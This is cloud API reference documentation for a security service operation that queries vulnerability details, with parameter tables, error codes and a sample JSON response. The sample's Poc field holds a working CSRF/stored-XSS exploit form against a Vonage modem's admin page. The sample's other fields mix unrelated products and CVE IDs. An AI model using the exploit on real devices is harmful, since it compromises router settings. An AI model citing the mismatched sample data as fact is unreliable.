DescribeVulDetails - Security Center - Alibaba Cloud Documentation Center

Queries the details about a vulnerability.

Debugging

OpenAPI Explorer automatically calculates the signature value. For your convenience, we recommend that you call this operation in OpenAPI Explorer.

Debug

Authorization information

The following table shows the authorization information corresponding to the API. The authorization information can be used in the Action policy element to grant a RAM user or RAM role the permissions to call this API operation. Description:

Operation: the value that you can use in the Action element to specify the operation on a resource.
Access level: the access level of each operation. The levels are read, write, and list.
Resource type: the type of the resource on which you can authorize the RAM user or the RAM role to perform the operation. Take note of the following items:
- The required resource types are displayed in bold characters.
- If the permissions cannot be granted at the resource level, All Resources is used in the Resource type column of the operation.
Condition Key: the condition key that is defined by the cloud service.
Associated operation: other operations that the RAM user or the RAM role must have permissions to perform to complete the operation. To complete the operation, the RAM user or the RAM role must have the permissions to perform the associated operations.

Operation	Access level	Resource type	Condition key	Associated operation
yundun-sas:DescribeVulDetails	Read	All Resources *	none	none

Request parameters

Parameter	Type	Required	Description	Example
Lang	string	Yes	The language of the content within the request and response. Valid values: zh: Chinese en: English	zh
Type	string	Yes	The type of the vulnerability. Valid values: cve: Linux software vulnerability sys: Windows system vulnerability cms: Web-CMS vulnerability app: application vulnerabilitiy emg: urgent vulnerability sca: vulnerability that is detected based on software component analysis	sca
Name	string	Yes	The name of the vulnerability. Note You can call the DescribeGroupedVul or DescribeVulList operation to query the names of vulnerabilities.	SCA:ACSV-2020-052801
AliasName	string	Yes	The vulnerability announcement.	RHSA-2019:3197-Important: sudo security update
ResourceDirectoryAccountId	long	No	The Alibaba Cloud account ID of the member in the resource directory. Note You can call the DescribeMonitorAccounts operation to obtain the IDs.	127608589417****

Response parameters

Parameter	Type	Description	Example
	object	The response parameters.
RequestId	string	The ID of the request, which is used to locate and troubleshoot issues.	EDA40EA3-6265-5900-AD99-C83E4F109CA8
Cves	object []	The details of the vulnerability.
Summary	string	The introduction to the vulnerability.	Chanjet T-Plus is an Internet business management software. There is an unauthorized access vulnerability in one of its interfaces disclosed on the Internet. Attackers can construct malicious requests to upload malicious files to execute arbitrary code and control the server.
Complexity	string	The difficulty level of exploiting the vulnerability. Valid values: LOW MEDIUM HIGH	LOW
Product	string	The service that is affected by the vulnerability.	Log4j2
PocCreateTime	long	The UNIX timestamp when the proof of concept (POC) was created. Unit: milliseconds.	1554189334000
CveId	string	The Common Vulnerabilities and Exposures (CVE) ID.	CVE-2019-9167
CnvdId	string	The China National Vulnerability Database (CNVD) ID.	CNVD-2019-9167
Reference	string	The reference of the vulnerability in the Alibaba Cloud vulnerability library. The value is a URL.	https://example.com
CvssScore	string	The Common Vulnerability Scoring System (CVSS) score of the vulnerability in the Alibaba Cloud vulnerability library.	10.0
Vendor	string	The vendor that disclosed the vulnerability.	Apache
PocDisclosureTime	long	The UNIX timestamp when the POC was disclosed. Unit: milliseconds.	1554189334000
Classify	string	The type of the vulnerability.	remote_code_execution
CvssVector	string	The vector that is used to calculate the CVSS score.	AV:N/AC:L/Au:N/C:C/I:C/A:C
VulLevel	string	The severity of the vulnerability. Valid values: serious high medium low	serious
ReleaseTime	long	The disclosure time that is displayed for the vulnerability in the Alibaba Cloud vulnerability library. The value is a UNIX timestamp. Unit: milliseconds.	1554189334000
Title	string	The title of the vulnerability announcement.	Chanjet T-Plus SetupAccount/Upload. Aspx file upload vulnerability(CNVD-2022-60632)
Solution	string	The fixing suggestions of the vulnerability.	<p>At present, Chanjet has urgently released a vulnerability patch to fix the vulnerability. CNVD recommends affected units and users to upgrade to the latest version immediately:</p>↵<p>https://www.chanjetvip.com/product/goods/goods-detail?id=53aaa40295d458e44f5d3ce5</p>↵<p>At the same time, organizations and users affected by the vulnerability are requested to immediately follow the steps below to conduct self-inspection and repair work:</p>↵<ol>↵<li><p>User self-check steps:↵<br />Check whether website/bin/load.aspx.cdcab7d2.compiled, website/bin/App_Web_load.aspx.cdcab7d2.dll, and tplus/Load.aspx files exist locally. If they exist, it means that they have been poisoned, and you must reinstall the system and install the product. patch.</p>↵</li>↵<li><p>Non-poisoned users please:↵<br />1) Update the latest product patch.↵<br />2) Install anti-virus software and update the virus database in time.↵<br />3) Upgrade the lower version of IIS and Nginx to IIS10.0 and Windows 2016.↵<br />4) Local installation customers need to confirm whether the backup file is complete as soon as possible, and do off-site backup. Customers on the cloud should enable the mirroring function in time.↵<br />5) Users who fail to update the patch in time can contact Chanjet technical support and take temporary preventive measures such as deleting files.</p>↵</li>↵<li><p>Poisoned users please:↵<br />1) Check whether the server has taken regular snapshots or backups. If so, you can restore data through snapshots or backups.↵<br />2) Contact Chanjet technical support to confirm whether it has the conditions and operation methods to restore data from backup files.</p>↵</li>↵</ol>↵<p>If you have any technical problems, please contact Chanjet technical support: 4006600566-9</p>
Content	string	The CVE content.	Apache Shiro is a user authentication and authorization framework for a wide range of rights management applications.↵Recently, Apache Shiro released version 1.7.0, which fixes the Apache Shiro authentication bypass vulnerability (CVE-2020-17510).↵Attackers can bypass Shiro's authentication using malicious requests containing payloads.↵↵Related bugs:↵CVE-2020-17510 Shiro < 1.7.0 Validation Bypass Vulnerability↵CVE-2020-13933 Shiro < 1.6.0 Validation Bypass Vulnerability↵CVE-2020-11989 Shiro < 1.5.3 Validation Bypass Vulnerability↵CVE-2020-1957 Shiro < 1.5.2 Validation Bypass Vulnerability↵CVE-2016-6802 Shiro < 1.3.2 Validation Bypass Vulnerability Check whether the fastjson version currently running on the system is in the affected version and whether safeMode is configured to disable autoType. If it is in the affected version and safeMode is not configured to disable autoType, the vulnerability is considered to exist.
Poc	string	The POC content.	NewDomain.html The x and y values will need to be changed accordingly <html> <p>Authenticated Stored CSRF/XSS - Vonage Modem</p> <form method="POST" action="http://192.168.15.1/goform/RgParentalBasic"> <input type="hidden" name="RemoveContentRule" value="0" /> <input type="hidden" name="AddContentRule" value="0" /> <input type="hidden" name="ContentRules" value="0" /> <input type="hidden" name="RuleSelect" value="0" / > <input type="hidden" name="NewKeyword" value="" / > <input type="hidden" name="KeywordAction" value="0" /> <input type="hidden" name="NewDomain" value="test'><script>alert(1)</script>" /> <input type="hidden" name="x" value="50" /> <input type="hidden" name="y" value="15" /> <input type="hidden" name="DomainAction" value="1" /> <input type="hidden" name="AllowedDomainAction" value="0" /> <input type="hidden" name="ParentalPassword" value="Broadcom" /> <input type="hidden" name="ParentalPasswordReEnter" value="Broadcom" /> <input type="hidden" name="AccessDuration" value="30" /> <input type="submit" title="Exploit" /> </form> </html> NewKeyword.html The x and y values will need to be changed accordingly <html> <p>Authenticated Stored CSRF/XSS - Vonage Modem</p> <form method="POST" action="http://192.168.15.1/goform/RgParentalBasic"> <input type="hidden" name="RemoveContentRule" value="0" /> <input type="hidden" name="AddContentRule" value="0" /> <input type="hidden" name="ContentRules" value="0" /> <input type="hidden" name="RuleSelect" value="0" / > <input type="hidden" name="NewKeyword" value="test'><script>alert(1)</script>" / > <input type="hidden" name="x" value="61" /> <input type="hidden" name="y" value="12" /> <input type="hidden" name="KeywordAction" value="1" /> <input type="hidden" name="NewDomain" value="" /> <input type="hidden" name="DomainAction" value="0" /> <input type="hidden" name="AllowedDomainAction" value="0" /> <input type="hidden" name="ParentalPassword" value="Broadcom" /> <input type="hidden" name="ParentalPasswordReEnter" value="Broadcom" /> <input type="hidden" name="AccessDuration" value="30" /> <input type="submit" title="Enable Service" /> </form> </html>
Classifys	object []	The vulnerability types.
Description	string	The description of the vulnerability type.	Remote code execution
Classify	string	The type of the vulnerability.	remote_code_execution
DemoVideoUrl	string	The URL of the demo video for the vulnerability.	https://example.com
OtherId	string	The ID of the vulnerability.	CVE-2020-8597
InstanceName	string	The name of the instance. Note This parameter is deprecated. You can call the DescribeVulList operation to query the instance that is affected by the vulnerability.	sql-test-001
InternetIp	string	The public IP address of the server. Note This parameter is deprecated. You can call the DescribeVulList operation to query the instance that is affected by the vulnerability.	47.114.XX.XX
IntranetIp	string	The private IP address of the server. Note This parameter is deprecated. You can call the DescribeVulList operation to query the instance that is affected by the vulnerability.	172.19.XX.XX
TargetId	string	The ID of the asset that is scanned. Note This parameter is deprecated. You can call the DescribeVulList operation to query the instance that is affected by the vulnerability.	m-bp17m0pc0xprzbwo****
TargetName	string	The name of the asset that is scanned. Note This parameter is deprecated. You can call the DescribeVulList operation to query the instance that is affected by the vulnerability.	frontend
CveLink	string	The link to the CVE details.	https://avd.aliyun.com/detail/CVE-2022-1184

Examples

Sample success responses

JSONformat

{
  "RequestId": "EDA40EA3-6265-5900-AD99-C83E4F109CA8",
  "Cves": [
    {
      "Summary": "Chanjet T-Plus is an Internet business management software. There is an unauthorized access vulnerability in one of its interfaces disclosed on the Internet. Attackers can construct malicious requests to upload malicious files to execute arbitrary code and control the server.",
      "Complexity": "LOW",
      "Product": "Log4j2",
      "PocCreateTime": 1554189334000,
      "CveId": "CVE-2019-9167",
      "CnvdId": "CNVD-2019-9167",
      "Reference": "https://example.com",
      "CvssScore": "10.0",
      "Vendor": "Apache",
      "PocDisclosureTime": 1554189334000,
      "Classify": "remote_code_execution",
      "CvssVector": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
      "VulLevel": "serious",
      "ReleaseTime": 1554189334000,
      "Title": "Chanjet T-Plus SetupAccount/Upload. Aspx file upload vulnerability(CNVD-2022-60632)",
      "Solution": "<p>At present, Chanjet has urgently released a vulnerability patch to fix the vulnerability. CNVD recommends affected units and users to upgrade to the latest version immediately:</p>↵<p>https://www.chanjetvip.com/product/goods/goods-detail?id=53aaa40295d458e44f5d3ce5</p>↵<p>At the same time, organizations and users affected by the vulnerability are requested to immediately follow the steps below to conduct self-inspection and repair work:</p>↵<ol>↵<li><p>User self-check steps:↵<br  />Check whether website/bin/load.aspx.cdcab7d2.compiled, website/bin/App_Web_load.aspx.cdcab7d2.dll, and tplus/Load.aspx files exist locally. If they exist, it means that they have been poisoned, and you must reinstall the system and install the product. patch.</p>↵</li>↵<li><p>Non-poisoned users please:↵<br  />1) Update the latest product patch.↵<br  />2) Install anti-virus software and update the virus database in time.↵<br  />3) Upgrade the lower version of IIS and Nginx to IIS10.0 and Windows 2016.↵<br  />4) Local installation customers need to confirm whether the backup file is complete as soon as possible, and do off-site backup. Customers on the cloud should enable the mirroring function in time.↵<br  />5) Users who fail to update the patch in time can contact Chanjet technical support and take temporary preventive measures such as deleting files.</p>↵</li>↵<li><p>Poisoned users please:↵<br  />1) Check whether the server has taken regular snapshots or backups. If so, you can restore data through snapshots or backups.↵<br  />2) Contact Chanjet technical support to confirm whether it has the conditions and operation methods to restore data from backup files.</p>↵</li>↵</ol>↵<p>If you have any technical problems, please contact Chanjet technical support: 4006600566-9</p>",
      "Content": "Apache Shiro is a user authentication and authorization framework for a wide range of rights management applications.↵Recently, Apache Shiro released version 1.7.0, which fixes the Apache Shiro authentication bypass vulnerability (CVE-2020-17510).↵Attackers can bypass Shiro's authentication using malicious requests containing payloads.↵↵Related bugs:↵CVE-2020-17510 Shiro < 1.7.0 Validation Bypass Vulnerability↵CVE-2020-13933 Shiro < 1.6.0 Validation Bypass Vulnerability↵CVE-2020-11989 Shiro < 1.5.3 Validation Bypass Vulnerability↵CVE-2020-1957 Shiro < 1.5.2 Validation Bypass Vulnerability↵CVE-2016-6802 Shiro < 1.3.2 Validation Bypass Vulnerability\nCheck whether the fastjson version currently running on the system is in the affected version and whether safeMode is configured to disable autoType. If it is in the affected version and safeMode is not configured to disable autoType, the vulnerability is considered to exist.",
      "Poc": "NewDomain.html\nThe x and y values will need to be changed accordingly\n<html>\n<p>Authenticated Stored CSRF/XSS - Vonage Modem</p>\n<form method=\"POST\" action=\"http://192.168.15.1/goform/RgParentalBasic\">\n<input type=\"hidden\" name=\"RemoveContentRule\" value=\"0\" />\n<input type=\"hidden\" name=\"AddContentRule\" value=\"0\" />\n<input type=\"hidden\" name=\"ContentRules\" value=\"0\" />\n<input type=\"hidden\" name=\"RuleSelect\" value=\"0\" / >\n<input type=\"hidden\" name=\"NewKeyword\" value=\"\" / >\n<input type=\"hidden\" name=\"KeywordAction\" value=\"0\" />\n<input type=\"hidden\" name=\"NewDomain\" value=\"test'><script>alert(1)</script>\" />\n<input type=\"hidden\" name=\"x\" value=\"50\" />\n<input type=\"hidden\" name=\"y\" value=\"15\" />\n<input type=\"hidden\" name=\"DomainAction\" value=\"1\" />\n<input type=\"hidden\" name=\"AllowedDomainAction\" value=\"0\" />\n<input type=\"hidden\" name=\"ParentalPassword\" value=\"Broadcom\" />\n<input type=\"hidden\" name=\"ParentalPasswordReEnter\" value=\"Broadcom\" />\n<input type=\"hidden\" name=\"AccessDuration\" value=\"30\" />\n<input type=\"submit\" title=\"Exploit\" />\n</form>\n</html>\n \nNewKeyword.html\nThe x and y values will need to be changed accordingly\n<html>\n<p>Authenticated Stored CSRF/XSS - Vonage Modem</p>\n<form method=\"POST\" action=\"http://192.168.15.1/goform/RgParentalBasic\">\n<input type=\"hidden\" name=\"RemoveContentRule\" value=\"0\" />\n<input type=\"hidden\" name=\"AddContentRule\" value=\"0\" />\n<input type=\"hidden\" name=\"ContentRules\" value=\"0\" />\n<input type=\"hidden\" name=\"RuleSelect\" value=\"0\" / >\n<input type=\"hidden\" name=\"NewKeyword\" value=\"test'><script>alert(1)</script>\" / >\n<input type=\"hidden\" name=\"x\" value=\"61\" />\n<input type=\"hidden\" name=\"y\" value=\"12\" />\n<input type=\"hidden\" name=\"KeywordAction\" value=\"1\" />\n<input type=\"hidden\" name=\"NewDomain\" value=\"\" />\n<input type=\"hidden\" name=\"DomainAction\" value=\"0\" />\n<input type=\"hidden\" name=\"AllowedDomainAction\" value=\"0\" />\n<input type=\"hidden\" name=\"ParentalPassword\" value=\"Broadcom\" />\n<input type=\"hidden\" name=\"ParentalPasswordReEnter\" value=\"Broadcom\" />\n<input type=\"hidden\" name=\"AccessDuration\" value=\"30\" />\n<input type=\"submit\" title=\"Enable Service\" />\n</form>\n</html>",
      "Classifys": [
        {
          "Description": "Remote code execution\n",
          "Classify": "remote_code_execution",
          "DemoVideoUrl": "https://example.com"
        }
      ],
      "OtherId": "CVE-2020-8597",
      "InstanceName": "sql-test-001",
      "InternetIp": "47.114.XX.XX",
      "IntranetIp": "172.19.XX.XX",
      "TargetId": "m-bp17m0pc0xprzbwo****",
      "TargetName": "frontend",
      "CveLink": "https://avd.aliyun.com/detail/CVE-2022-1184"
    }
  ]
}

Error codes

HTTP status code	Error code	Error message	Description
400	InnerError	InnerError	-
400	DataExists	%s data exist	-
400	RdCheckNoPermission	Resource directory account verification has no permission.	-
403	NoPermission	caller has no permission	You are not authorized to do this operation.
500	RdCheckInnerError	Resource directory account service internal error.	-
500	ServerError	ServerError	-

For a list of error codes, visit the Service error codes.

Change history

Change time

Summary of changes

Operation

2023-10-24

The Error code has changed. The response structure of the API has changed

see changesets

Change item	Change content
Error Codes	The Error code has changed.
	delete Error Codes: 400
	delete Error Codes: 500
Output Parameters	The response structure of the API has changed.

2023-08-07

The Error code has changed. The response structure of the API has changed

see changesets

Change item	Change content
Error Codes	The Error code has changed.
	delete Error Codes: 400
	delete Error Codes: 500
Output Parameters	The response structure of the API has changed.

2023-07-20

The Error code has changed. The request parameters of the API has changed

see changesets

Change item	Change content
Error Codes	The Error code has changed.
	Error Codes 400 change
	Added Error Codes: 500
Input Parameters	The request parameters of the API has changed.
	Added Input Parameters: ResourceDirectoryAccountId

2023-03-16

The Error code has changed

see changesets

Change item	Change content
Error Codes	The Error code has changed.
	delete Error Codes: 400